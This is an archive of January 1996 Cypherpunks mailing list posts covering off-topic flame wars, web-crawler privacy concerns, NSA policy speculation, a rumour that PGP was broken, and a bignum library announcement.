Content-Type: text/plain


[ Dear Perry, this is CYPHERpunks, not WHINERpunks.  Please resist
  the temptation to flame me for being off-topic since flaming for
  being off-topic is just as off-topic as this is.		   ]

-----BEGIN PGP SIGNED MESSAGE-----

To: Mark Rogaski <wendigo@pobox.com>
cc: Cypherpunks <cypherpunks@toad.com>
Subject: Better diversity through cages (?!)
In-reply-to: Mark Rogaski's message of "Tue, 16 Jan 1996 00:58:49 EST."
             <m0tc4Px-000jQZC@gti.gti.net> 

    Date: Tue, 16 Jan 1996 00:58:49 -0500 (EST)
    From: Mark Rogaski <wendigo@pobox.com>
    
    - From the node of Timothy C. May:
    : 
    : Diversity will be enhanced by having the birds in the U.S., and
    : if left in their native jungles, most will die anyway. Better a
    : pampered tropical bird in a gilded cage than lunch for some
    : predator, or starvation as the jungles are cleared by
    : slash-and-burn farmers.
    
    Aside from the amusing belief that caged life is preferrable, let
    me point out that importation of species can be pretty nasty.
    Zebra mussels in the Great Lakes, Mongooses in Hawaii, those nasty
    snakes from Guam ... etc, etc.

Good point.  If you view nature as a market system of survival
capital, trying to seriously alter it rather than just living off of
it is asking for trouble.  This is true for command economy
governments, slash-and-burn farmers, and species importers.  Nature
(the market) will continue, but the meddlers (humans) are risking
their chance to be players.

Two more reasons why the better-diversity-through-cages
is weak:

 - many (most?) species tend not to reproduce in captivity.
 - most illegal imported animals die in transit.

The tropical bird has better odds of survival against the predator and
starvation than it has against smugglers and gilded cage operators.
If you consider the odds of reproducing, they're *much* better with
the predator and starvation than with the smugglers and cagers.

			Rick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPvhVJNR+/jb2ZlNAQHIvQQApvMNs63M5XRtMvvpKlG7kR6PSF3xUI1r
6yGn6KtMAJKY5vW/bbF7EIo7azakiMein8QGlNdpBXjXfuvBs2RM/oPTq2qcKPQH
7f3DdLYcCmbXwElE35KpowJbqRG7cXpzV426W7YJi3ZuUCBA/uUaISyDMrgCPIVI
aquISSze6ko=
=fHbg
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Jan 1996 02:13:08 +0800
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: Better diversity through cages (?!)
In-Reply-To: <9601161734.AA27525@cfdevx1.lehman.com>
Message-ID: <199601161745.MAA02159@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker writes:
> [ Dear Perry, this is CYPHERpunks, not WHINERpunks.  Please resist
>   the temptation to flame me for being off-topic since flaming for
>   being off-topic is just as off-topic as this is.		   ]

Sorry, but no.

If you know that your posting is off topic, you shouldn't be posting
it, period. Reply in private or some such. The S to N ratio in these
parts is dropping rapidly, and its largely the fault of people who
think "just one more off topic post can't hurt". One person doing it
causes little damage, but unfortunately dozens upon dozens feel the
urge every day.

I usually just reply to such posts in private and note that they are
off topic, but since you insisted on bringing it up in public...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 17 Jan 1996 02:52:22 +0800
To: perry@piermont.com
Subject: Re: Better diversity through cages (?!)
In-Reply-To: <199601161745.MAA02159@jekyll.piermont.com>
Message-ID: <9601161749.AA28041@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 16 Jan 1996 12:45:03 -0500
    From: "Perry E. Metzger" <perry@piermont.com>
    
    
    Rick Busdiecker writes:
    > [ Dear Perry, this is CYPHERpunks, not WHINERpunks.  Please resist
    >   the temptation to flame me for being off-topic since flaming for
    >   being off-topic is just as off-topic as this is.		   ]
    
    Sorry, but no.

Then either you must think that this *is* WHINERpunks, or you are a
hypocrit.
    
    I usually just reply to such posts in private and note that they are
    off topic, but since you insisted on bringing it up in public...

Well, you sure post a hell of a lot of them to the list.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@tssun5.dsccc.com (Ed Carp @ TSSUN5)
Date: Wed, 17 Jan 1996 04:06:48 +0800
To: tcmay@got.net
Subject: Re: Spiderspace
Message-ID: <9601161853.AA13284@tssun5.>
MIME-Version: 1.0
Content-Type: text/plain



> From: tcmay@got.net (Timothy C. May)

> Sure enough, a search of "Cyberia-l" in Alta Vista showed all sorts of
> hits, including what appeared to be several _private archives_ of parts of
> the traffic. (By "private" I mean in the sense that they were someone's
> personal archives, and not necessarily complete or even semi-officially
> sanctioned.)

There are any number of reasons this migh have shown up - if the private
archives are accessible to the public, for example ... but ...

> Declan McCullagh, on the Cyberia-l list, followed up to my post on this
> topic by noting that things will really get interesting when the internal
> file systems of many sites are made searchable, such as with the Andrew
> File System (AFS) at CMU and elsewhere. Apparently most users make their
> directories accessible to others.

... I was under the impression that the only documents that most web crawlers
will search are documents that are link-accessible.  Are you saying that this
isn't true?  Are you saying that Alta-Vista will search EVERYTHING that's
publicly accessible, whether by anonymous FTP or web?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 17 Jan 1996 04:33:53 +0800
To: cypherpunks@toad.com
Subject: Re: CelBomb
In-Reply-To: <Pine.SUN.3.91.960115200633.18120B-100000@polaris.mindport.net>
Message-ID: <doug-9600161914.AA002018317@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Just FYI:

Time has a different twist on the entire story than the 'trusted
compatriot hands over rigged phone' story that has been the basis
for comment around here. Their take on it was that Israeli intelligence
was gradually triangulating the frequency of his phone over time, and
was eventually able to setup some interference on his frequency such
that he thought the phone was going bad (dropped calls and such I suppose).
 So, he sent the phone back to the factory. The Intelligence service, with
the cooperation of the factory, intercepted the phone, placed the bomb,
and then sent it back. Sometime later, they (somehow) get him on the phone,
confirm it is him, and send the detonate code/tone/beep. Instant
lobotomy.


--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 17 Jan 1996 05:10:51 +0800
To: ecarp@tssun5.dsccc.com (Ed Carp @ TSSUN5)
Subject: Re: Spiderspace
In-Reply-To: <9601161853.AA13284@tssun5.>
Message-ID: <9601161922.AA13227@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Ed Carp writes:
 > ... I was under the impression that the only documents that most web crawlers
 > will search are documents that are link-accessible.  Are you saying that this
 > isn't true?  Are you saying that Alta-Vista will search EVERYTHING that's
 > publicly accessible, whether by anonymous FTP or web?

Ah, but if it hits a site that's set up with a top-level directory
which *does* contain an "index" page but whose server *doesn't*
recognize the index page name, then when you hit the site you
(probably) get one of those server-generated indices.  Those things
generally have *everything* in the directory visible (except those
files blocked by the server configuration, usually stuff like emacs
temp files), and so there you go...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Wed, 17 Jan 1996 07:48:28 +0800
To: cypherpunks@toad.com
Subject: new web security product
Message-ID: <199601161933.OAA10516@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


I wouldn't pass this along normally, but it seems to allow folks to use
their credit cards at home securely.  Bye-bye, First Virtual... ;)

	http://www.cnn.com/TECH/9601/encryption/index.html
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 17 Jan 1996 03:35:44 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Better diversity through Perrymoose.
In-Reply-To: <199601161745.MAA02159@jekyll.piermont.com>
Message-ID: <Pine.3.89.9601161317.A43623-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


(Sorry Perry, I just couldn't resist :-> )

On Tue, 16 Jan 1996, Perry E. Metzger wrote:

> Sorry, but no.
> 
> If you know that your posting is off topic, you shouldn't be posting
> it, period. Reply in private or some such. The S to N ratio in these
> parts is dropping rapidly, and its largely the fault of people who
> think "just one more off topic post can't hurt". One person doing it
> causes little damage, but unfortunately dozens upon dozens feel the
> urge every day.
			What is a toad machine? 

In the spirit of John's evolutionary programming post, I submit that
cypherpunks and all its components (on topic posts, jya's news reports, sheer
paranoia, clueless newbies wanting to join or leave, Klaus! VFP, flamewars, 
perryflames...) constitute a dynamic and evolving optimizing computational 
(enough fuzzy words for you?) system of which we are the calculators. 

Think of toad.com as an input/output box to interface us cells(not to 
mention a strange attractor for every cook on the net). We have a 
topic (or goal) of cryptography and anonymity, codewriters to give us 
something other than politics to talk about, a persistent random noise 
function to increase diversity, and Perry as a factor of noise limitation.
Obviously massively parallel. Is this a genetic algorithm, a semantic net,
or some other model? I dunno. As I hear the *plonking* sound of killfiles 
closing in on me and my inane post, I wonder...where will it go?
A topic for further study.

;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 17 Jan 1996 10:58:48 +0800
To: cypherpunks@toad.com
Subject: [NOISE]cypherpunks meeting
Message-ID: <2.2.32.19960116223852.0087a680@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This is one of the strangest pieces of mail I have recieved in a while.  I
know it is not nice to publish private mail, but this has got to be the most
clueless response i have gotten yet on the portland Cypherpunks meeting.

Either this guy has lost total connection to his clue-server or he left his
terminal logged in...  Either way it is pretty funny.  (At least he did not
make any references to the "tentacles" of Tim May... ]:> )

>Date: Tue, 16 Jan 1996 07:39:55 -0500 (EST)
>From: paul <phoffman@oven.ccds.charlotte.nc.us>
>X-Sender: phoffman@oven
>To: alano@teleport.com
>Subject: cypherpunks meeting

>
>I THINK THAT ALL CYPHER PUNKS ARE S BUNCH OF FAGGOTS HAVING MEETINGS TO 
>SEE WHO THEY "WANT"  ALL OF YOU CAN SEND YOUR GAY MESSAGES WITH KEYS 
>SOMEWHER ELSE YOU DAMN FAGGOTS!
>
>paul
>
>***************************************************
>*copyright 1995 phoffman@oven.ccds.charlotte.nc.us*
>*	   1996 foffman@aol.com			  *
>***************************************************
>
>
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Jan 1996 07:28:37 +0800
To: ecarp@netcom.com
Subject: Re: new web security product
In-Reply-To: <199601161933.OAA10516@dal1820.computek.net>
Message-ID: <199601161948.OAA02322@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Ed Carp, KHIJOL SysAdmin" writes:
> I wouldn't pass this along normally, but it seems to allow folks to use
> their credit cards at home securely.  Bye-bye, First Virtual... ;)
> 
> 	http://www.cnn.com/TECH/9601/encryption/index.html

I don't think its going to fly. No one wants to pay for an unneeded
$100 piece of hardware to encrypt the same credit card over and over
again, when a nearly zero marginal cost piece of software can do the
same thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "greg pitz" <pitz@onetouch.com>
Date: Wed, 17 Jan 1996 11:21:07 +0800
To: cypherpunks@toad.com
Subject: pgp broken?
Message-ID: <9601162346.AA22192@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In speaking with an associate, he mentioned in passing that PGP had 
been broken a few weeks ago in San Diego by the DoD using a Cray.  
All questioning about said subject was ended immediately as he felt 
that he might have said too much how it was.  Was PGP "broken"?

His background:  Prez of a firm with offices in D.C. & Silicon 
Valley.  He is a former Thunderbird pilot, and so has some 
connections in the military.  He has designed many hardware 
encrypting configurations using the VLSI007 chip as well as other 
chips that I am not familiar with.  One of his present projects is
designing a hardware encryption layout for Apple. 

Could this be part of the reason the charges were dropped against 
Phil as well?

>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<
greg pitz                                              pitz@onetouch.com 
>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 17 Jan 1996 07:12:47 +0800
To: cypherpunks@toad.com
Subject: Re: Spiderspace
Message-ID: <9600168218.AA821836310@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
On 1/16/96 12:35 PM, tcmay@got.net (Timothy C. May) at Internet-USA wrote:

     
> I've been thinking a lot about the problems and opportunities that are 
> coming up as more and more "spiders" (Web searchers, crawlers) are 
> indexing directories and files on systems they can find.

[snip]
     
     
> Sure enough, a search of "Cyberia-l" in Alta Vista showed all sorts of 
> hits, including what appeared to be several _private archives_ of parts 
> of the traffic. (By "private" I mean in the sense that they were 
> someone's personal archives, and not necessarily complete or even 
> semi-officially sanctioned.)
     
     [snip]
     
> I've started to look for things like PGP files laying around buried in 
> subdirectories. I can imagine attacks based on this.
     
[snip]
     
> Fourth...left to your imagination.
     
> --Tim May
     
> We got computers, we're tapping phone lines, we know that that ain't 
> allowed. 
> ---------:---------:---------:---------:---------:---------:---------:---- 
> Timothy C. May              | Crypto Anarchy: encryption, digital money, 
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero 
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets, 
> Higher Power: 2^756839 - 1  | black markets, collapse of governments. 
> "National borders aren't even speed bumps on the information superhighway."
     
     I gather that it would be a Bad Thing (TM) to have someone get both 
     the encrypted and clear text forms of your message (from either you or 
     from the recipient)
     
     Maybe regularly changing your encryption keys is a Good Thing (TM)
     
     Martin G. Diehl
     
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 17 Jan 1996 17:00:51 +0800
To: cypherpunks@toad.com
Subject: remarkable recent stories
Message-ID: <199601170017.QAA19922@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I haven't seen much dialogue on some key things that have popped up
recently of high relevance to this list; forgive me if these are covered
in threads (inappropriately named?):

1. GNN had an article in which Madsen (puzzle palace coauthor I believe)
stated that the NSA was trying to restrict anonymity by working behind
the scenes with Lotus, Microsoft, etc.  major meat for TCM's "NSA visits"
compendium assuming he's still working on it.  also, it sounds like the
most direct evidence that the NSA is working against anonymity in cyberspace, 
something that really surprises me.

2. the same article had Madsen stating that the NSA is vacuuming down
Internet traffic. he gave the likely entry points that they are doing this.
this is one of the first major credible insistences I've seen that
the NSA is doing this. (there are of course a bazillion urban legends
that the NSA does this). Madsen claimed that some private companies
were getting contracts for the work. hmmmmmmm, possibility of some
cyphersabotage here, like what went on with mycotronix? (sp?)

3. the absolute biggest blockbuster of them all: the NSA supposedly
did a study about how crypto regulations affect US competitiveness in
the international marketplace and *concluded* they were damaging it.
(surprise!!)  the Commerce Dept. has recommended *easing* export 
regulations.  

this is very notable for several reasons:
- The NSA would probably not release the study unless they were hinting
at a new policy decision. they do a bazillion studies surely but none of
them see the light of the public day. why would they release *this* one?

- the commerce dept is probably heavily influenced by the NSA-- i.e. I doubt
that they would come out with a favorable recommendation for crypto unless
the NSA approved. however, on the other hand, in the articles there was
a caveat that "if the military and spy agencies allow it". not sure what
was meant by that.

- what I wonder is if the same NSA study was more comprehensive and tried
to look at the overall implications of current or altered crypto export
policy. i.e., did they try to address the question, "what would really
happen to overall US situation if crypto were unregulated? would it mean
better business? more or less crime?" etc.  I have said this before, but
everyone seems to *assume* that unrestricted crypto necessarily releases
the 4 horsemen of the infocalypse, but what if an actual *study* was
done, that potentially *contradicts* this idea? there are many examples of
new technology being introduced that has an effect far different than
that anticipated by the masses or the conventional wisdom, and often much
more benign than expected.

- what this all suggests to me is a possible major policy/political
switch inside the NSA in which possibly someone who is more in favor of 
code making than code breaking is gaining the reigns. its tough to 
guess based on the NSA's entrails, but recent events are some pretty 
odiferous entrails, I'd be interested to here what others think.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 17 Jan 1996 21:17:55 +0800
To: cypherpunks@toad.com
Subject: Re: Spiderspace
Message-ID: <m0tcLuH-00096WC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 AM 1/16/96 -0800, Timothy C. May wrote:
>
>I've been thinking a lot about the problems and opportunities that are
>coming up as more and more "spiders" (Web searchers, crawlers) are indexing
>directories and files on systems they can find.
>
>For the sake of this post, the files and whatnot these spiders and
>super-spiders can hit constitute a universe I'll call "spiderspace," as it
>semi-euphoniously matches cyberspace and cypherspace.
[stuff deleted]

>Implications for Cypherpunks?
>
>First, an alert for you to be very careful about what you make accessible
>to the outside world. It's no longer just a matter of people taking the
>time to rummage through your subdirectories, it's now trivial to find
>things with the new Web search engines.
>
>Second, what is out there in spiderspace is incredibly useful for building
>dossiers, for compiling correlations, and for doing competitive analyses.
>
>Third, more and more kinds of files are going into spiderspace. This may
>include files compiled by others, such as files containing Web accesses!
>(All it takes is for someone to keep a record of site accesses,
>subscriptions, etc., and then put record in a searchable place: it then
>becomes trivial to search on a name and find out interesting things.)
>--Tim May

Consider this:  In about 10-20 years, the people who have been using 
Internet about now will come into the age from which (statistically) 
American presidents are usually chosen.  Look at what just one letter 
Clinton sent (draft-dodge, etc) did.  Now imagine literally YEARS of 
messages online, archived on terabytes of optical tape, searchable...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Wed, 17 Jan 1996 18:17:36 +0800
To: Martin Diehl <cypherpunks@toad.com>
Subject: RE: Spiderspace
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960116163928SV000D02@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


I think Tim was referring to someone gleaning your private key, which would 
be a Disastrous Thing (tm). If that's not what he was referring to, I still 
think it's a possiblity.

Kurt

----------
From: 	Martin Diehl[SMTP:mdiehl@dttus.com]
Sent: 	Tuesday, January 16, 1996 13:59
To: 	cypherpunks@toad.com
Subject: 	Re: Spiderspace

     
On 1/16/96 12:35 PM, tcmay@got.net (Timothy C. May) at Internet-USA wrote:

     
> I've been thinking a lot about the problems and opportunities that are 
> coming up as more and more "spiders" (Web searchers, crawlers) are 
> indexing directories and files on systems they can find.

[snip]
     
     
> Sure enough, a search of "Cyberia-l" in Alta Vista showed all sorts of 
> hits, including what appeared to be several _private archives_ of parts 
> of the traffic. (By "private" I mean in the sense that they were 
> someone's personal archives, and not necessarily complete or even 
> semi-officially sanctioned.)
     
     [snip]
     
> I've started to look for things like PGP files laying around buried in 
> subdirectories. I can imagine attacks based on this.
     
[snip]
     
> Fourth...left to your imagination.
     
> --Tim May
     
> We got computers, we're tapping phone lines, we know that that ain't 
> allowed. 
> ---------:---------:---------:---------:---------:---------:---------:---- 

> Timothy C. May              | Crypto Anarchy: encryption, digital money, 
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero 

> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets, 

> Higher Power: 2^756839 - 1  | black markets, collapse of governments. 
> "National borders aren't even speed bumps on the information 
superhighway."
     
     I gather that it would be a Bad Thing (TM) to have someone get both 
     the encrypted and clear text forms of your message (from either you or 
     from the recipient)
     
     Maybe regularly changing your encryption keys is a Good Thing (TM)
     
     Martin G. Diehl
     
     
     







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 17 Jan 1996 06:46:35 +0800
To: cypherpunks@toad.com
Subject: Re: Better diversity through Perrymoose.
In-Reply-To: <Pine.3.89.9601161317.A43623-0100000@aix2.uottawa.ca>
Message-ID: <199601162143.QAA05083@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


Can't we just solve the problem by making it a moderated list; 
and make Perry the moderator?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Wed, 17 Jan 1996 10:46:28 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: remarkable recent stories
In-Reply-To: <199601170017.QAA19922@netcom2.netcom.com>
Message-ID: <Pine.SUN.3.91.960116180817.1875C-100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain


	Vladimir:

On Tue, 16 Jan 1996, Vladimir Z. Nuri wrote:

> - what this all suggests to me is a possible major policy/political
> switch inside the NSA in which possibly someone who is more in favor of 
> code making than code breaking is gaining the reigns. its tough to 
> guess based on the NSA's entrails, but recent events are some pretty 
> odiferous entrails, I'd be interested to here what others think.

	Interesting theory.   Maybe even factual.  I don't know.

	Caveat:  After decades of secrecy, the NSA has come out
	of the cold so to speak.  Are we to safely assume that
	the NSA has not had it's major mission changed in a few
	major ways when it came into the open?  

	Suppose the NSA was simply being used as a cutout
	for its replacement, which is even more sub rosa?

        xan

        jonathon
        grafolog@netcom.com




**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
***********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 17 Jan 1996 08:51:50 +0800
To: attila <attila@primenet.com>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <Pine.BSD.3.91.960116073156.8962B-100000@usr2.primenet.com>
Message-ID: <Pine.SV4.3.91.960116180442.8762C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I didn't say I like the State. I said that there isn't, relatively 
speaking, much *political* content to the police-state that is the border.

Remember when those Sandanista sympathizers made the news, quite a number 
of years ago, for getting detained /FBI-interogated/harrassed when they 
crossed back into the USA?  It made the news because that sort of thing 
*is out of the ordinary* for the USA.

And, while I will certainly entertain the suggestion that their actions 
had a political underpinning, the Feds didn't lack for allegations of 
violation of United States Statutes to justify the harrasment.

If these  do-gooders had been doing something that comported with the 
sympathys of the (then) Administration, if they were in step with the 
Emperor's current "party line", then any such criminal violations would 
have been ignored. We all know that. So what?  Welcome to realpolitic.


Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Wed, 17 Jan 1996 08:53:02 +0800
To: cypherpunks@toad.com
Subject: Re: Bignum support in C++
In-Reply-To: <199601160319.WAA02872@toxicwaste.media.mit.edu>
Message-ID: <9601162318.AA06850@w20-575-14.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Okay, I setup a quick web site for the large integer class I talked
about yesterday.  The URL is 

http://www.mit.edu:8001/people/grimm/Int/Int.home.html

Included in the package is a quick demonstration using Fibonacci
numbers.  (Beware: the code as-is spits everything out in hex.)

Comments, suggestions, etc. are always welcome.

-James




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 17 Jan 1996 08:52:17 +0800
To: attila <attila@primenet.com>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <Pine.BSD.3.91.960116073156.8962B-100000@usr2.primenet.com>
Message-ID: <Pine.SV4.3.91.960116181746.8762E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



The notorious questionaire to the SEALS wasn't an official action. It was 
one lieutenient doing an assignment for a night class.

I never said that the federal government was good, or nice, or useful. 

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Jan 1996 22:33:07 +0800
To: pitz@onetouch.com
Subject: Re: pgp broken?
In-Reply-To: <9601162346.AA22192@toad.com>
Message-ID: <199601162359.SAA02856@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"greg pitz" writes:
> In speaking with an associate, he mentioned in passing that PGP had 
> been broken a few weeks ago in San Diego by the DoD using a Cray.  
> All questioning about said subject was ended immediately as he felt 
> that he might have said too much how it was.  Was PGP "broken"?

How could you break "PGP" per se using lots of computer power? Its an
encryption system, not a particular key. What would the Cray have been
doing? Running an AI program trying to come up with new factoring
algorithms?

Now, I could believe that someone could break PGP -- perhaps by
finding some weakness in the implementation of RSA, or the RNG, or
maybe even a weakness in RSA itself. However, I have a great deal of
trouble believing that PGP *itself* was broken "using a Cray". If it
is going to be broken, it will be done using a few pounds of neurons
fed by a blood supply (at least until real AIs are out there
publishing math papers).

> Could this be part of the reason the charges were dropped against 
> Phil as well?

I doubt it. The statute of limitations was going to expire soon in any
case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Wed, 17 Jan 1996 18:52:15 +0800
To: cypherpunks@toad.com
Subject: Re: new web security product
Message-ID: <179FD40110D@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 16 Jan 96 at 14:48, Perry E. Metzger wrote:

: 
: "Ed Carp, KHIJOL SysAdmin" writes:
: > I wouldn't pass this along normally, but it seems to allow folks to use
: > their credit cards at home securely.  Bye-bye, First Virtual... ;)
: > 
: > 	http://www.cnn.com/TECH/9601/encryption/index.html
: 
: I don't think its going to fly. No one wants to pay for an unneeded
: $100 piece of hardware to encrypt the same credit card over and over
: again, when a nearly zero marginal cost piece of software can do the
: same thing.
: 
	I am not even sure it IS an encryption device.  They say
"Potentially vulnerable personal account information is scrambled
or encrypted on the magnetic stripe on the card. It is
electronically transferred through the hardware. That eliminates
the need to say or "key in" the account number or expiration
date. "

	It may just be a low cost? mag stripe reader...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPw78DUjeCeeebC9AQFmnAf/Sa/2jeRj/Oe7Vd5JEcIZZOIAhQK9XJI5
LQQGmKI9T2ZrzAeBI5eL+SdVvEs7PFqaW3tRVWaZDmW90uuL7qWcR732pRPOJ39k
CL3SuHx0sUrPakjw2S+1JNZjLxQfgJNgMDGWLYVKIFvKPKjgUh2xAl6BagwaLJCa
P5U4HwHWdmF8zQgBkFPzBKYYBZBJU7oqz2G9NV2H0cYtkQ2rZJS1sVk5ng8/RsYx
b3Sw99WCBk9zVAy37NWKOJGlemk114ktgO4iL4iii23/lZR1zYhZDGJ+47ZPsSy7
Gt6JtQUWHzcnuQBoqwLYOog15GnWF9jIli/RK1K25wsDyCk5mMQsvA==
=nW8l
-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Certainly the game is rigged.  Don't let that stop you; If you
don't bet, you can't win.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Wed, 17 Jan 1996 15:51:38 +0800
To: cypherpunks@toad.com
Subject: Orlando Key Signing
Message-ID: <v01520c0cad21e3245ba1@[199.227.1.151]>
MIME-Version: 1.0
Content-Type: text/plain


I recently moved to Orlando, FL and I would like to know if there are any
cypherpunks in this area interested in getting together for a key signing.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)

No man's life, liberty or property are safe while the legislature is in session.

2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 17 Jan 1996 18:39:44 +0800
To: llurch@networking.stanford.edu
Subject: Re: [NOISE] Re: Eggs at Customs (fwd)
Message-ID: <01I037KU6I7OA0UHYW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


